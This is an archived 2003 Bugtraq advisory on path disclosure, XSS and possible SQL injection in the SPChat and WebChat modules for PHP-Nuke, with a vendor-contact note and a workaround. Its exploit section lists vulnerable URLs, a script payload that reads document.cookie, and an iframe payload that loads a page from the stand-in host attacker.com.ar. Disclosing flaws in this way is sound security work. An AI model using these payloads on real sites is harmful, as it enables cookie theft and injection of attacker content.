lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <17057.1054420151@www61.gmx.net>
Date: Sun, 1 Jun 2003 00:29:11 +0200 (MEST)
From: Rynho Zeros Web <hackargentino@....net>
To: bugtraq@...urityfocus.com
Subject: [ PHP-Nuke :] Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
      Vendor URL: http://www.saarport.net
       Vuln Type: XSS (Cross Site Scripting), Path Disclosure, revealed of
DBUser Name, possible injection SQL
          Status: Vendor contacted, In a moment estara available the patched
version.
(http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
          Author: XyborG (http://www.rzw.com.ar)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro:
~~~~~~
SFChat & WebChat are very good and stable systems of chat online.  But it
has his faults :)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note:  The name of the WebChat module can change, I I will use that name.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:
~~~~~~~~~

Vendor has contacted and In a moment estara available the patched version.
To Fix the script temporarily, you must erase this script of your Web, or 
change its name so that nobody has access, but checks the Web of the creator

in search of the new patch, to be able to continue using this service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
~~~~~~~~

Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules/WebChat/out.php

----- Source Code -----

<br />
<b>Warning</b>:  Access denied for user: 'victim@...alhost' (Using password:
YES) in
<b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect
failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.

----- Source Code -----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path
Disclosure:
~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclorure & revealed of DBUser Name & XSS, SQL Injection?
:
http://www.victim.com/modules/WebChat/in.php
http://www.victim.com/modules/WebChat/quit.php
http://www.victim.com/modules/WebChat/users.php
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SPChat Ver.
0.8.0:
~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----

(Note:  Replace '?'  by '<')

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ